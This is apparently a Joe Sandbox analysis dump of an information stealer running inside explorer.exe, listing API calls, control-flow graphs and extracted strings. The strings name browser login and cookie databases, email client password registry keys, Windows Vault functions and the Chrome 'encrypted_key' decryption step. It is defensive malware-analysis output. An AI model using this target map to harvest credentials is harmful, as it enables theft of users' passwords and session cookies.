                                                                                                                                                                                  • Part of subcall function 0E626F6C: GetProcessHeap.KERNEL32 ref: 0E626FA0
                                                                                                                                                                                  • Part of subcall function 0E626F6C: HeapFree.KERNEL32 ref: 0E626FAE
                                                                                                                                                                                  • Part of subcall function 0E6275F8: GetProcessHeap.KERNEL32 ref: 0E62765D
                                                                                                                                                                                  • Part of subcall function 0E6275F8: HeapFree.KERNEL32 ref: 0E62766B
                                                                                                                                                                                  • Part of subcall function 0E627C00: SHGetFolderPathA.SHELL32 ref: 0E627C3B
                                                                                                                                                                                  • Part of subcall function 0E624A90: HeapAlloc.KERNEL32 ref: 0E624B06
                                                                                                                                                                                  • Part of subcall function 0E62453C: lstrcpyA.KERNEL32 ref: 0E624564
                                                                                                                                                                                  • Part of subcall function 0E62453C: lstrcatA.KERNEL32 ref: 0E624575
                                                                                                                                                                                  • Part of subcall function 0E62453C: RegOpenKeyExA.ADVAPI32 ref: 0E624599
                                                                                                                                                                                • wsprintfA.USER32 ref: 0E6253BF
                                                                                                                                                                                  • Part of subcall function 0E62453C: RegEnumKeyExA.ADVAPI32 ref: 0E6245E0
                                                                                                                                                                                  • Part of subcall function 0E62453C: RegOpenKeyExA.ADVAPI32 ref: 0E624622
                                                                                                                                                                                  • Part of subcall function 0E62453C: lstrcpyW.KERNEL32 ref: 0E624650
                                                                                                                                                                                  • Part of subcall function 0E62453C: RegQueryValueExW.ADVAPI32 ref: 0E624686
                                                                                                                                                                                  • Part of subcall function 0E62453C: RegCloseKey.ADVAPI32 ref: 0E6247A7
                                                                                                                                                                                  • Part of subcall function 0E62453C: RegEnumKeyExA.ADVAPI32 ref: 0E6247DF
                                                                                                                                                                                  • Part of subcall function 0E62453C: RegCloseKey.ADVAPI32 ref: 0E6247FA
                                                                                                                                                                                • SHGetFolderPathA.SHELL32 ref: 0E6254F3
                                                                                                                                                                                • lstrcatA.KERNEL32 ref: 0E625508
                                                                                                                                                                                  • Part of subcall function 0E625ABC: SHGetFolderPathA.SHELL32 ref: 0E625AF7
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E625690
                                                                                                                                                                                • HeapAlloc.KERNEL32 ref: 0E6256A2
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 0E6256D2
                                                                                                                                                                                • OpenFileMappingA.KERNEL32 ref: 0E6256F3
                                                                                                                                                                                • MapViewOfFile.KERNEL32 ref: 0E625718
                                                                                                                                                                                • UnmapViewOfFile.KERNEL32 ref: 0E625724
                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 0E62572D
                                                                                                                                                                                • wprintf.LEGACY_STDIO_DEFINITIONS ref: 0E62573D
                                                                                                                                                                                • wprintf.LEGACY_STDIO_DEFINITIONS ref: 0E62574C
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E625756
                                                                                                                                                                                • HeapFree.KERNEL32 ref: 0E625764
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E62576F
                                                                                                                                                                                • HeapFree.KERNEL32 ref: 0E62577D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$Free$AddressProc$Close$AllocOpen$FileFolderPath$CreateEnumHandleProcess32TaskViewlstrcatlstrcpywprintf$ByteCharCurrentFirstInitializeInstanceLibraryLoadMappingMultiNextQuerySnapshotToolhelp32UnmapValueWidewsprintf
                                                                                                                                                                                • String ID: %s$%s$00:39:18$12345$1Email$1HTTP Server URL$1HTTP User$1HTTPMail Password2$1HTTPMail Server$1HTTPMail User Name$1IMAP Password2$1IMAP Server$1IMAP User$1IMAP User Name$1NNTP Email Address$1NNTP Password2$1NNTP Server$1NNTP User Name$1POP3 Password2$1POP3 Server$1POP3 User$1POP3 User Name$1SMTP Email Address$1SMTP Password2$1SMTP Server$1SMTP User$1SMTP User Name$2IMAP Port$2POP3 Port$2SMTP Port$360Browser\Browser$3HTTPMail Password$3IMAP Password$3NNTP Password$3POP3 Password$3SMTP Password$7Star\7Star$@$Amigo$Bromium$CentBrowser$Chedot$Chromium$CocCoc\Browser$Comodo\Dragon$Elements Browser$Epic Privacy Browser$Go!$Google\Chrome$Google\Chrome SxS$Kometa$Mar 29 2024$Microsoft\Edge$Nichrome$Orbitum$QIP Surf$Rafotech\Mustang$RockMelt$Safer Technologies\Secure Browser$Software\Microsoft\Office\%u.0\Outlook\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$Sputnik\Sputnik$Suhba$Superbird$Torch$Vivaldi$Xpom$Yandex\YandexBrowser$\Mozilla\Firefox\Profiles\$\User Data\Default\Login Data$\User Data\Default\Network\Cookies$\User Data\Default\Web Data$build$cookies.sqlite$cr_cookie$cr_pass$edge_cookie$edge_pass$ff_cookie$ff_pass$ie_cookie$ie_pass$outlook_pass$uCozMedia\Uran$w~y&
                                                                                                                                                                                • API String ID: 3620056986-83399204
                                                                                                                                                                                • Opcode ID: f8cb71ce208a17df0a9b5c5da18c7179ac2a3ecd80bdeebe11308395ec280a4b
                                                                                                                                                                                • Instruction ID: 41ed2ca6ce92c71a7090c522592f30c92d3558c2e8241c1fbdfabd9859ea3eb8
                                                                                                                                                                                • Opcode Fuzzy Hash: f8cb71ce208a17df0a9b5c5da18c7179ac2a3ecd80bdeebe11308395ec280a4b
                                                                                                                                                                                • Instruction Fuzzy Hash: CB622535605F9295EA11EF24FC903DD33A4FB65B84F80193A895E27768EF3ACA48C744

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreatePipe.KERNEL32 ref: 03112233
                                                                                                                                                                                • SetHandleInformation.KERNEL32 ref: 0311224D
                                                                                                                                                                                • CreatePipe.KERNEL32 ref: 0311226E
                                                                                                                                                                                • SetHandleInformation.KERNEL32 ref: 03112288
                                                                                                                                                                                • CreatePipe.KERNEL32 ref: 031122A9
                                                                                                                                                                                • SetHandleInformation.KERNEL32 ref: 031122C3
                                                                                                                                                                                • CreateProcessW.KERNEL32 ref: 03112385
                                                                                                                                                                                  • Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE
                                                                                                                                                                                • PeekNamedPipe.KERNEL32 ref: 03112434
                                                                                                                                                                                • ReadFile.KERNEL32 ref: 03112490
                                                                                                                                                                                • PeekNamedPipe.KERNEL32 ref: 031124E4
                                                                                                                                                                                • ReadFile.KERNEL32 ref: 03112540
                                                                                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 03112579
                                                                                                                                                                                • TerminateProcess.KERNEL32 ref: 031125AA
                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 031125B8
                                                                                                                                                                                  • Part of subcall function 0311C704: NtDelayExecution.NTDLL ref: 0311C726
                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 031125C6
                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 031125D4
                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 031125E2
                                                                                                                                                                                  • Part of subcall function 031182B4: NtFreeVirtualMemory.NTDLL ref: 031182E5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                                                                • String ID: h
                                                                                                                                                                                • API String ID: 30365702-2439710439
                                                                                                                                                                                • Opcode ID: 860013f4a01bfb73d4a4f28ae6cd5b482c5936efda44fe53a241f8bb7cd9ace6
                                                                                                                                                                                • Instruction ID: 256e1f58b624ab2aad592158851e41898866028e99cf1d5ec581019a8b9557e4
                                                                                                                                                                                • Opcode Fuzzy Hash: 860013f4a01bfb73d4a4f28ae6cd5b482c5936efda44fe53a241f8bb7cd9ace6
                                                                                                                                                                                • Instruction Fuzzy Hash: BBC1CE36218BC08AE760CB65F49479BB7A1F3C8754F408526EA8987A68DFBCC559CF40

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 352 e6289e4-e628a0e 353 e628a14-e628a27 LoadLibraryA 352->353 354 e628b1e 352->354 356 e628b08 353->356 357 e628a2d-e628ac8 GetProcAddress * 6 353->357 355 e628b25-e628b2b 354->355 361 e628b32-e628b39 355->361 358 e628b0a-e628b1d 356->358 359 e628aca-e628ad1 357->359 360 e628aff-e628b02 FreeLibrary 357->360 359->360 362 e628ad3-e628ada 359->362 360->356 361->356 364 e628b3b-e628b3f 361->364 362->360 363 e628adc-e628ae3 362->363 363->360 365 e628ae5-e628aec 363->365 364->356 366 e628b41-e628b46 364->366 365->360 367 e628aee-e628af1 365->367 368 e628d18-e628d24 call e6c4008 366->368 369 e628b4c-e628b59 366->369 367->360 370 e628af3-e628afd 367->370 368->358 372 e628b5d-e628b81 call e6c4020 369->372 370->355 376 e628b87-e628ba0 call e6c4018 372->376 377 e628ce9-e628cfa 372->377 382 e628ba6-e628bb7 376->382 383 e628cdf-e628ce3 call e6c4028 376->383 377->372 379 e628d00-e628d06 377->379 379->368 381 e628d08-e628d13 call e627680 * 2 379->381 381->368 386 e628cd5-e628cd9 call e6c4008 382->386 387 e628bbd-e628bc7 382->387 383->377 386->383 390 e628bcb-e628bd5 387->390 392 e628bdb-e628be6 390->392 393 e628cb9-e628cc5 390->393 392->393 394 e628bec-e628c1e call e6c4040 392->394 393->390 395 e628ccb-e628cd1 393->395 394->393 398 e628c24-e628c29 394->398 395->386 398->393 399 e628c2f-e628c31 398->399 400 e628c33-e628c4d call e6248cc 399->400 401 e628c51-e628cb5 call e62750c call e6270a0 * 3 call e627680 call e6c4008 399->401 400->401 401->393
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                • String ID: VaultCloseVault$VaultEnumerateItems$VaultEnumerateVaults$VaultFree$VaultGetItem$VaultOpenVault$ie_vault$pass$vaultcli.dll
                                                                                                                                                                                • API String ID: 2449869053-2044244656
                                                                                                                                                                                • Opcode ID: aec5936509b53667a6e6f178e038e2e7f35dddd7b55a4be1b787a5e39b0be16c
                                                                                                                                                                                • Instruction ID: 4ae451774819149d1c32e4aabfda664e377c1c5926485f8d5a037db52172b7f1
                                                                                                                                                                                • Opcode Fuzzy Hash: aec5936509b53667a6e6f178e038e2e7f35dddd7b55a4be1b787a5e39b0be16c
                                                                                                                                                                                • Instruction Fuzzy Hash: B0914772711F958AEB14DF65FC643A923B0F759B88F50092ACE5A63B28DF39C8098740

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 416 e626604-e62664f lstrcpyA lstrlenA 417 e626651-e626662 lstrcatA 416->417 418 e626668-e626690 lstrcatA FindFirstFileA 416->418 417->418 419 e626822-e62682d 418->419 420 e626696 418->420 421 e62669d-e6266a1 420->421 422 e6266a7-e6266ab 421->422 423 e62677e-e626788 421->423 426 e6266c6-e6266da lstrcpyA 422->426 427 e6266ad-e6266b2 422->427 424 e62678a-e62679a StrStrIA 423->424 425 e62679c-e6267b0 lstrcpyA 423->425 424->425 428 e626804-e626813 FindNextFileA 424->428 429 e6267b2-e6267be lstrcatA 425->429 430 e6267c4-e6267eb lstrcatA 425->430 432 e6266ee-e626717 lstrcatA * 2 426->432 433 e6266dc-e6266e8 lstrcatA 426->433 427->428 431 e6266b8-e6266ba 427->431 428->421 438 e626819-e62681c FindClose 428->438 429->430 435 e6267f0-e626802 430->435 431->426 434 e6266bc-e6266c0 431->434 436 e626743-e62676a call e626604 432->436 437 e626719-e626737 432->437 433->432 434->426 434->428 435->428 435->438 436->428 444 e626770-e62677c 436->444 437->438 443 e62673d 437->443 438->419 443->436 444->435
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$Findlstrcpy$File$CloseFirstNextlstrlen
                                                                                                                                                                                • String ID: *.*$\
                                                                                                                                                                                • API String ID: 2453054391-2874222586
                                                                                                                                                                                • Opcode ID: 5a99298ae7c46de716506d94cc817f34561c862b1145259e25b225ece9022be3
                                                                                                                                                                                • Instruction ID: f1113734fa901018e2b31c8867357c4ed552deacf68c717294ff53b68f13f296
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a99298ae7c46de716506d94cc817f34561c862b1145259e25b225ece9022be3
                                                                                                                                                                                • Instruction Fuzzy Hash: BA519E32204AD19ADF20CF24F8587ED33B1F795B98F545525EA8E57AA8DF39C948CB00

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 445 e6b9708-e6b973c call e6b8e84 call e6b8eec 450 e6b9742-e6b974d call e6b8e8c 445->450 451 e6b9941-e6b9982 call e6b1ffc call e6b8e84 call e6b8eec 445->451 456 e6b992c-e6b9940 call e6b1ffc 450->456 457 e6b9753-e6b975d 450->457 475 e6b9988-e6b9993 call e6b8e8c 451->475 476 e6b9b17-e6b9b85 call e6b1ffc call e6b2240 451->476 456->451 459 e6b975f-e6b9765 457->459 460 e6b9785-e6b978e call e6b4ed0 457->460 463 e6b9768-e6b9773 459->463 472 e6b9791-e6b9798 460->472 467 e6b977d-e6b977f 463->467 468 e6b9775-e6b977b 463->468 467->460 471 e6b98dc-e6b98ec 467->471 468->463 468->467 472->472 474 e6b979a-e6b97ba call e6b4f10 call e6b4ed0 472->474 474->471 491 e6b97c0-e6b97c7 474->491 483 e6b9999-e6b99a4 call e6b8ebc 475->483 484 e6b9b02-e6b9b16 call e6b1ffc 475->484 498 e6b9b8e-e6b9b91 476->498 499 e6b9b87-e6b9b8c 476->499 496 e6b99aa-e6b99cd call e6b4ed0 GetTimeZoneInformation 483->496 497 e6b9aed-e6b9b01 call e6b1ffc 483->497 484->476 491->491 495 e6b97c9-e6b97d7 call e6b4e70 491->495 514 e6b97dd-e6b97f7 call e6c09d0 495->514 515 e6b9917-e6b992b call e6b1ffc 495->515 516 e6b99d3-e6b99f5 496->516 517 e6b9ac6-e6b9aec call e6b8e7c call e6b8e6c call e6b8e74 496->517 497->484 504 e6b9b98-e6b9ba8 call e6b4f10 498->504 505 e6b9b93-e6b9b96 498->505 503 e6b9bdc-e6b9bee 499->503 510 e6b9bff call e6b9958 503->510 511 e6b9bf0-e6b9bf3 503->511 519 e6b9baa 504->519 520 e6b9bb3-e6b9bce call e6b2240 504->520 505->503 521 e6b9c04-e6b9c30 call e6b4ed0 call e6c2bd0 510->521 511->510 518 e6b9bf5-e6b9bfd call e6b9708 511->518 541 e6b97fd-e6b9800 514->541 542 e6b9902-e6b9916 call e6b1ffc 514->542 515->456 525 e6b99ff-e6b9a06 516->525 526 e6b99f7-e6b99fc 516->526 518->521 529 e6b9bac-e6b9bb1 call e6b4ed0 519->529 551 e6b9bd0-e6b9bd3 520->551 552 e6b9bd5-e6b9bd7 call e6b4ed0 520->552 535 e6b9a08-e6b9a10 525->535 536 e6b9a20-e6b9a23 525->536 526->525 529->505 535->536 544 e6b9a12-e6b9a1e 535->544 537 e6b9a26-e6b9a62 call e6bd96c WideCharToMultiByte 536->537 563 e6b9a72-e6b9a75 537->563 564 e6b9a64-e6b9a67 537->564 549 e6b980b-e6b9815 541->549 550 e6b9802-e6b9809 541->550 542->515 544->537 557 e6b981a-e6b9828 call e6b314c 549->557 558 e6b9817 549->558 550->541 550->549 551->529 552->503 570 e6b982b-e6b982f 557->570 558->557 565 e6b9a78-e6b9aae WideCharToMultiByte 563->565 564->563 567 e6b9a69-e6b9a70 564->567 568 e6b9abf-e6b9ac3 565->568 569 e6b9ab0-e6b9ab3 565->569 567->565 568->517 569->568 571 e6b9ab5-e6b9abd 569->571 572 e6b9831-e6b9835 570->572 573 e6b9837-e6b983a 570->573 571->517 572->573 574 e6b983c-e6b983f 572->574 573->570 575 e6b988d-e6b9890 574->575 576 e6b9841-e6b9857 call e6b314c 574->576 577 e6b9892-e6b9894 575->577 578 e6b9897-e6b98a5 575->578 584 e6b9860-e6b9864 576->584 577->578 580 e6b98c1-e6b98c5 578->580 581 e6b98a7-e6b98bd call e6c09d0 578->581 585 e6b98c8-e6b98da call e6b8e7c call e6b8e6c 580->585 581->585 590 e6b98bf-e6b9901 call e6b1ffc 581->590 587 e6b9859-e6b985b 584->587 588 e6b9866-e6b9869 584->588 585->471 587->588 591 e6b985d 587->591 588->575 592 e6b986b-e6b987e call e6b314c 588->592 590->542 591->584 600 e6b9887-e6b988b 592->600 600->575 602 e6b9880-e6b9882 600->602 602->575 603 e6b9884 602->603 603->600
                                                                                                                                                                                APIs
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 0E6B9746
                                                                                                                                                                                  • Part of subcall function 0E6B8E8C: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8EA0
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 0E6B9735
                                                                                                                                                                                  • Part of subcall function 0E6B8EEC: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8F00
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 0E6B997B
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 0E6B998C
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 0E6B999D
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32 ref: 0E6B99C4
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 0E6B9A5A
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 0E6B9AA6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                                • String ID: -$:$:$?$Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                • API String ID: 3440502458-2354618740
                                                                                                                                                                                • Opcode ID: cbfc0f5ff51ac8a7906312dfaf2d67d83576dee486a354c7ff1febf89045c9fb
                                                                                                                                                                                • Instruction ID: 671b32130159603d2fc0adc8f958772c4f0734dce520a7c095d1b47793155dbb
                                                                                                                                                                                • Opcode Fuzzy Hash: cbfc0f5ff51ac8a7906312dfaf2d67d83576dee486a354c7ff1febf89045c9fb
                                                                                                                                                                                • Instruction Fuzzy Hash: A2D122362107908AD724DF31F8507DA7BA6F7CA7D8F485529EB5A47B58DB38C882C700

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 604 e624948-e624976 CreateToolhelp32Snapshot 605 e624a6f-e624a8c 604->605 606 e62497c-e624994 Process32First 604->606 607 e624a66-e624a69 CloseHandle 606->607 608 e62499a-e6249a2 GetCurrentProcessId 606->608 607->605 609 e624a50-e624a60 Process32Next 608->609 609->607 610 e6249a7-e6249b3 609->610 610->609 611 e6249b9-e6249bc 610->611 611->609 612 e6249c2-e6249d5 OpenProcess 611->612 612->609 613 e6249d7-e624a31 StrStrIA * 3 612->613 614 e624a33-e624a36 613->614 615 e624a3c-e624a41 TerminateProcess 613->615 614->615 616 e624a38-e624a3a 614->616 617 e624a47-e624a4a CloseHandle 615->617 616->615 616->617 617->609
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CloseHandleProcess32$CreateCurrentFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                • String ID: chrome.exe$iexplore.exe$msedge.exe
                                                                                                                                                                                • API String ID: 477742948-2002101784
                                                                                                                                                                                • Opcode ID: fe7781aa355af09044517de538f76c2667a12ca60234848eb8ea9a4026d88ee0
                                                                                                                                                                                • Instruction ID: 1a3c93a0fd1bb20f5c7a28eb2e08af373ecda5b4af6ad46e3aa6e9890ee5f4c5
                                                                                                                                                                                • Opcode Fuzzy Hash: fe7781aa355af09044517de538f76c2667a12ca60234848eb8ea9a4026d88ee0
                                                                                                                                                                                • Instruction Fuzzy Hash: 20319C31314FA181EF10CB21F8147693761FB95BD0F584625CAAE537A8DF3AD94ACB40

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 618 e625e5c-e625e83 call e626500 621 e625e85-e625e87 618->621 622 e625e8c-e625e90 618->622 623 e625fcd-e625fe0 621->623 622->621 624 e625e92-e625ea9 StrStrIA 622->624 625 e625fb5-e625fca GetProcessHeap HeapFree 624->625 626 e625eaf-e625ec4 StrChrA 624->626 625->623 626->625 627 e625eca-e625ed6 626->627 627->625 628 e625edc-e625eef call e626358 627->628 628->625 631 e625ef5-e625efb 628->631 631->625 632 e625f01-e625f36 CryptUnprotectData 631->632 632->625 633 e625f38-e625f56 GetProcessHeap call e6c5168 632->633 633->625 636 e625f58-e625f63 633->636 637 e625fa1-e625faf LocalFree 636->637 638 e625f65-e625f68 636->638 637->625 638->637 639 e625f6a-e625f88 GetProcessHeap call e6c5168 638->639 639->637 642 e625f8a-e625f8d 639->642 643 e625f90-e625f9c 642->643 643->643 644 e625f9e 643->644 644->637
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$AllocFree$CreateCryptDataFileLocalUnprotect
                                                                                                                                                                                • String ID: "encrypted_key":"
                                                                                                                                                                                • API String ID: 3383461352-877455259
                                                                                                                                                                                • Opcode ID: 1bff8699f9d97ab45fd99e227eb735527e09be475eebc417901f9c033e89b636
                                                                                                                                                                                • Instruction ID: a44b8310c213054c6cf5137e173137d34a5162e153de2ada8b155e8b10936e65
                                                                                                                                                                                • Opcode Fuzzy Hash: 1bff8699f9d97ab45fd99e227eb735527e09be475eebc417901f9c033e89b636
                                                                                                                                                                                • Instruction Fuzzy Hash: E241BE32701BA09AEB209F61FC083AD67A1BB49B88F544439DE4F53B58EF39C845CB01

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 703 3118424-311845d call 311b388 706 3118466-3118487 GetAdaptersInfo 703->706 707 311845f-3118461 703->707 709 3118676-311867c 706->709 710 311848d-31184c0 call 311b388 GetAdaptersInfo call 311b4cc 706->710 708 31187ea-31187f1 707->708 712 3118688-31186a6 call 311b388 709->712 713 311867e-3118683 call 31182b4 709->713 719 31184c5-31184c8 710->719 720 31187e5 712->720 721 31186ac-31186c3 GetComputerNameExA 712->721 713->712 722 31184d9-31184e1 719->722 723 31184ca-31184d7 719->723 720->708 724 31186c5-31186dc call 311b4cc 721->724 725 3118729-3118740 GetComputerNameExA 721->725 726 31184e6-31184fe wsprintfA 722->726 723->726 737 31186ed-31186f5 724->737 738 31186de-31186eb 724->738 728 3118746-311874b 725->728 729 31187db-31187e0 call 31182b4 725->729 730 3118502-311850a 726->730 733 311874d-311875a 728->733 734 311875c-3118763 728->734 729->720 736 3118516-3118525 730->736 735 311876b-3118782 call 311b4cc 733->735 734->735 748 3118784-3118794 735->748 749 3118796-311879e 735->749 740 31185f2-3118609 call 311b4cc 736->740 741 311852b-3118530 736->741 742 31186fa-3118725 wsprintfA 737->742 738->742 754 311860b-3118618 740->754 755 311861a-3118622 740->755 745 3118573-311858a call 311b4cc 741->745 746 3118532-3118549 call 311b4cc 741->746 742->725 757 311859b-31185a3 745->757 758 311858c-3118599 745->758 760 311854b-3118558 746->760 761 311855a-3118562 746->761 753 31187a6-31187d7 wsprintfA 748->753 749->753 753->729 759 3118627-3118659 wsprintfA 754->759 755->759 763 31185a8-31185ad 757->763 758->763 764 311865b 759->764 765 311865d-3118670 759->765 762 3118567-3118571 760->762 761->762 766 31185b2-31185ed wsprintfA 762->766 763->766 764->709 765->709 765->730 766->736
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE
                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI ref: 03118470
                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI ref: 031184A7
                                                                                                                                                                                • wsprintfA.USER32 ref: 031184F0
                                                                                                                                                                                • wsprintfA.USER32 ref: 031185DB
                                                                                                                                                                                • wsprintfA.USER32 ref: 0311863F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                • String ID: o
                                                                                                                                                                                • API String ID: 2074107575-252678980
                                                                                                                                                                                • Opcode ID: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
                                                                                                                                                                                • Instruction ID: db16e1ba143860a7bbef7357fbf1d78dc7a52ffe6c898fa0418830fe5f1fb707
                                                                                                                                                                                • Opcode Fuzzy Hash: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
                                                                                                                                                                                • Instruction Fuzzy Hash: 22A1EA76209B848BDB64CB14F48039AB7A4F78C784F444525EA8E83B68EF7CC664CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$CloseHandle$Open
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2762225225-0
                                                                                                                                                                                • Opcode ID: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                                                • Instruction ID: fbf71bacfc4ebdd58210de416c1594c45b8ab256c1a29031995a2396740926c3
                                                                                                                                                                                • Opcode Fuzzy Hash: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                                                • Instruction Fuzzy Hash: F051F376218B8087DBA0CB15F4A479EB7A0F3C9794F405125EB8A87B68DF7DC4A4CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0E62117C: GetSystemDirectoryW.KERNEL32 ref: 0E62119F
                                                                                                                                                                                • FindFirstFileW.KERNEL32 ref: 0E6217F0
                                                                                                                                                                                • FindNextFileW.KERNEL32 ref: 0E62182F
                                                                                                                                                                                • LoadLibraryW.KERNEL32 ref: 0E621840
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFind$DirectoryFirstLibraryLoadNextSystem
                                                                                                                                                                                • String ID: \*.dll
                                                                                                                                                                                • API String ID: 834730945-3280006307
